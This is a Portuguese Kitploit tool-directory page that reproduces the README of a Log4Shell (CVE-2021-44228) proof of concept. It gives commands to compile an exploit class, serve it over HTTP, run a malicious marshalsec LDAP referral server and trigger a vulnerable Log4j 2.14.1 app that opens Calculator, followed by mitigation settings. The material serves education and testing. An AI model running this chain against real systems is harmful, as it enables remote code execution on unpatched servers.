Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/sunnyvale-it/cve-2021-44228-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubsunnyvale-it/cve-2021-44228-poc

CVE-2021-44228-PoC

Prova de Conceito do CVE-2021-44228 (Log4Shell)

Ver Repositório
854há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-44228 (Log4Shell) Prova de Conceito

As funcionalidades JNDI do Apache Log4j2 <=2.14.1 usadas na configuração, mensagens de log e parâmetros não protegem contra LDAP controlado pelo atacante e outros endpoints relacionados ao JNDI. Um atacante que pode controlar mensagens de log ou parâmetros de mensagens de log pode executar código arbitrário carregado de servidores LDAP quando a substituição de lookups de mensagem está habilitada.

Para ajudar os clientes a entender como essa falha funciona, preparamos este repositório com uma Prova de Conceito simples e funcional.

Pré-requisitos

Tendo instalado localmente:

  • Git
  • JDK 11
  • Maven
  • Python

No momento, o código arbitrário inicia o aplicativo Calculadora no macOS ou Windows, portanto, apenas esses dois sistemas operacionais são suportados por este PoC.

Aviso Legal

Todas as informações e códigos são fornecidos exclusivamente para fins educacionais e/ou teste de seus próprios sistemas para esta vulnerabilidade.

A técnica de ataque

Este PoC se assemelha ao descrito na imagem abaixo (créditos GovCERT.ch), com exceção do servidor vulnerável que é apenas uma classe Java simples por questões de simplicidade. É importante entender que essa vulnerabilidade pode ser desencadeada de várias maneiras, o que é descrito abaixo é apenas uma delas.

Como executar o PoC

Clone este repositório

root@kitploit:~
terminal1 $ git clone https://github.com/sunnyvale-it/CVE-2021-44228-PoC.git

Compile o exploit (usando JDK 11)

root@kitploit:~
terminal1 $ javac Exploit.java

Execute um servidor HTTP para servir o exploit

root@kitploit:~
terminal1 $ python -m SimpleHTTPServer 8888 --directory .

Inicie o servidor LDAPRefServer malicioso (agradecimentos a https://github.com/mbechler/marshalsec)

root@kitploit:~
terminal2 $ java -cp tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Execute a aplicação com falha (contendo log4j 2.14.1)

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

Se tudo ocorreu bem, o aplicativo Calculadora (execução de código arbitrário) deve aparecer

Mitigações rápidas (funcionam em versões do Log4J 2.10.0 até 2.14.1)

Defina a variável de ambiente LOG4J_FORMAT_MSG_NO_LOOKUPS como true

root@kitploit:~
terminal3 $ export LOG4J_FORMAT_MSG_NO_LOOKUPS=true 
root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

Neste caso, a Calculadora não deve mais aparecer

Execute a aplicação com a propriedade de sistema log4j2.formatMsgNoLookups definida como true

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec -Dlog4j2.formatMsgNoLookups=true

Neste caso, a Calculadora não deve mais aparecer

Baixar ferramenta